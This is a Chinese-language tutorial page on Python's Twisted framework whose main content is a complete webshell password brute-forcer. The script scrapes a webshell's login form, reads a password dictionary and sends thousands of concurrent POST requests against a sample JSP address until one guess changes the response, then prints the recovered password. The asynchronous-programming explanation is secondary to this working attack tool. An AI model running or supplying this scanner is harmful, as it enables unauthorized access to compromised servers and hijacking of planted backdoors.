利用Python的Twisted框架實現(xiàn)webshell密碼掃描器的教程
好久以來都一直想學習windows中得iocp技術,即異步通信,但是經(jīng)過長時間研究別人的c++版本,發(fā)現(xiàn)過于深奧了,有點吃力,不過幸好python中的twisted技術的存在方便了我。
iocp即異步通信技術,是windows系統(tǒng)中現(xiàn)在效率最高的一種選擇,異步通信顧名思義即與同步通信相對,我們平時寫的類似socket.connect accept等都屬于此范疇,同樣python中得urlopen也是同步的(為什么提這個,是因為和后面的具體實現(xiàn)有關),總而言之,我們平時寫的絕大多數(shù)socket,http通信都是同步的。
同步的程序優(yōu)點是好想,好寫。缺點大家都應該感受到過,比如在connect的時候,recive的時候,程序都會阻塞在那里,等上片刻才能繼續(xù)前進。
異步則是另一種處理思路,類似于xml解析的sax方法,換句話說,就是當面臨conncet,recive等任務的時候,程序先去執(zhí)行別的代碼,等到網(wǎng)絡通信有了結果,系統(tǒng)會通知你,然后再去回調剛才中斷的地方。
具體的代碼下面有,我就細說了,大概總結下下面代碼涉及到的技術
1.頁面解析,webshell密碼自動post,必然涉及到頁面解析問題,即如何去找到頁面中form表單中合適的input元素并提交,其中包括了hidden的有value,password的需要配合字典。具體實現(xiàn)靠的是SGMLParser
2.正常的頁面請求,我利用了urlopen(為了使用cookie,實際使用的是opener),片段如下
cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) req = urllib2.Request(url, urllib.urlencode(bodyfieleds)) resp = opener.open(req, timeout=60) strlist = resp.read()
代碼簡單,這就是python的魅力,bodyfieleds即為post的參數(shù)部分,是一個字典
3.異步的頁面請求,這里用了twisted的getpage片段如下:
self.PostDATA[self.passw] = passl #print temp zs = getPage(self.url, method='POST', postdata=urllib.urlencode(self.PostDATA), headers=self.headers) zs.addCallback(self.parse_page, self.url, passl).addErrback(self.fetch_error, self.url, passl)
可以看到如何利用getPage去傳遞Post參數(shù),以及header(cookie也是防盜header里面的)
以及自定義的Callback函數(shù),可以添加寫你需要的參數(shù)也傳過去,我這里使用了url和pass
4.協(xié)程并發(fā),代碼如下:
def InitTask(self): for passl in self.passlist[:]: d = self.addURL(passl) yield d def DoTask(self): deferreds = [] coop = task.Cooperator() work = self.InitTask() for i in xrange(self.ThreadNum): d = coop.coiterate(work) deferreds.append(d) dl = defer.DeferredList(deferreds)
就是這些了。效率上,我在網(wǎng)絡通信較好的情況下,40s可以發(fā)包收包大致16000個
# -*- coding: utf-8 -*- #coding=utf-8 # # # code by icefish # http://insight-labs.org/ # http://wcf1987.iteye.com/ # from twisted.internet import iocpreactor iocpreactor.install() from twisted.web.client import getPage from twisted.internet import defer, task from twisted.internet import reactor import os from httplib import HTTPConnection import urllib import urllib2 import sys import cookielib import time import threading from Queue import LifoQueue #import httplib2 from sgmllib import SGMLParser import os from httplib import HTTPConnection import urllib import urllib2 import sys import cookielib import time import threading from Queue import LifoQueue from sgmllib import SGMLParser class URLLister(SGMLParser): def __init__(self): SGMLParser.__init__(self) self.input = {} def start_input(self, attrs): #print attrs for k, v in attrs: if k == 'type': type = v if k == 'name': name = v if k == 'value': value = v if type == 'hidden' and value != None: self.input[name] = value if type == 'password' : self.input['icekey'] = name class webShellPassScan(object): def __init__(self, url, dict): self.url = url self.ThreadNum = 10 self.dict = dict def getInput(self, url): html, c = self.PostUrl(url, '') parse = URLLister() parse.feed(html) return parse.input def PostUrl(self, url, bodyfieleds): try: cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) req = urllib2.Request(url, urllib.urlencode(bodyfieleds)) resp = opener.open(req, timeout=60) strlist = resp.read() cookies = [] for c in cj: cookies.append(c.name + '=' + c.value) return strlist, cookies except : return '' def parse_page(self, data, url, passk): #print url self.TestNum = self.TestNum + 1 if data != self.sret and len(data) != 0 and data != 'iceerror': self.timeEnd = time.time() print 'Scan Password End :' + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(self.timeEnd)) print 'total Scan Time:' + str((self.timeEnd - self.timeStart)), 's' print 'total Scan Passwords:' + str(self.TestNum) print "*************************the key pass***************************\n" print passk print "*************************the key pass***************************\n" reactor.stop() if self.TestNum % 1000 == 0: #print TestNum sys.stdout.write('detect Password Num:' + str(self.TestNum) + '\n') sys.stdout.flush() def fetch_error(self, error, url, passl): self.addURL(passl) def run(self): self.timeStart = 0 self.timeEnd = 0 self.TestNum = 0 self.sret = '' print '\n\ndetect the WebShell URL:' + self.url self.PassNum = 0 self.timeStart = time.time() print 'Scan Password Start :' + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(self.timeStart)) filepath = os.path.abspath(os.curdir) file = open(filepath + "\\" + self.dict) self.passlist = [] for lines in file: self.passlist.append(lines.strip()) #print lines.strip() file.close() PassNum = len(self.passlist) print 'get passwords num:' + str(PassNum) inputdic = self.getInput(self.url) self.passw = inputdic['icekey'] del inputdic['icekey'] self.PostDATA = dict({self.passw:'icekey'}, **inputdic) self.sret, cookies = self.PostUrl(self.url, self.PostDATA) self.headers = {'Content-Type':'application/x-www-form-urlencoded'} self.headers['cookies'] = cookies print 'cookies:' + str(cookies) self.DoTask() #self.DoTask2() #self.DoTask3() print 'start run' self.key = 'start' reactor.run() def InitTask(self): for passl in self.passlist[:]: d = self.addURL(passl) yield d def InitTask2(self): for passl in self.passlist[:]: d = self.sem.run(self.addURL, passl) self.deferreds.append(d) def InitTask3(self): for passl in self.passlist[:]: d = self.addURL(passl) self.deferreds.append(d) def DoTask(self): deferreds = [] coop = task.Cooperator() work = self.InitTask() for i in xrange(self.ThreadNum): d = coop.coiterate(work) deferreds.append(d) dl = defer.DeferredList(deferreds) #dl.addErrback(self.errorCall) #dl.addCallback(self.finish) def DoTask2(self): self.deferreds = [] self.sem = defer.DeferredSemaphore(self.ThreadNum) self.InitTask2() dl = defer.DeferredList(self.deferreds) def DoTask3(self): self.deferreds = [] self.InitTask3() dl = defer.DeferredList(self.deferreds) def addURL(self, passl): self.PostDATA[self.passw] = passl #print temp zs = getPage(self.url, method='POST', postdata=urllib.urlencode(self.PostDATA), headers=self.headers) zs.addCallback(self.parse_page, self.url, passl).addErrback(self.fetch_error, self.url, passl) return zs a = webShellPassScan('http://192.168.0.2:8080/f15.jsp', 'source_new.txt') a.run()
- python如何通過twisted搭建socket服務
- Python3.6中Twisted模塊安裝的問題與解決
- python安裝twisted的問題解析
- python如何通過twisted實現(xiàn)數(shù)據(jù)庫異步插入
- python基于twisted框架編寫簡單聊天室
- python 編程之twisted詳解及簡單實例
- Python 基于Twisted框架的文件夾網(wǎng)絡傳輸源碼
- 剖析Python的Twisted框架的核心特性
- 實例解析Python的Twisted框架中Deferred對象的用法
- 詳解Python的Twisted框架中reactor事件管理器的用法
- 使用Python的Twisted框架編寫非阻塞程序的代碼示例
- Python的Twisted框架中使用Deferred對象來管理回調函數(shù)
- 使用Python的Twisted框架構建非阻塞下載程序的實例教程
- Python的Twisted框架上手前所必須了解的異步編程思想
- 使用Python的Treq on Twisted來進行HTTP壓力測試
- 使用Python的Twisted框架實現(xiàn)一個簡單的服務器
- 使用Python的Twisted框架編寫簡單的網(wǎng)絡客戶端
- python開發(fā)實例之Python的Twisted框架中Deferred對象的詳細用法與實例
相關文章
使用Python手工計算x的算數(shù)平方根,來自中國古人的數(shù)學智慧
本篇采用的計算方法既非二分法也非牛頓迭代法,而是把中國古代的手工計算平方根的方法轉成代碼來完成。代碼有點煩雜,算是拋磚引玉吧,期待高手們寫出更好的代碼來2021-09-09Pytorch 實現(xiàn)focal_loss 多類別和二分類示例
今天小編就為大家分享一篇Pytorch 實現(xiàn)focal_loss 多類別和二分類示例,具有很好的參考價值,希望對大家有所幫助。一起跟隨小編過來看看吧2020-01-01Python實現(xiàn)爬蟲IP負載均衡和高可用集群的示例代碼
做大型爬蟲項目經(jīng)常遇到請求頻率過高的問題,這里需要說的是使用爬蟲IP可以提高抓取效率,本文主要介紹了Python實現(xiàn)爬蟲IP負載均衡和高可用集群的示例代碼,感興趣的可以了解一下2023-12-12pytorch關于Tensor的數(shù)據(jù)類型說明
這篇文章主要介紹了pytorch關于Tensor的數(shù)據(jù)類型說明,具有很好的參考價值,希望對大家有所幫助。如有錯誤或未考慮完全的地方,望不吝賜教2022-07-07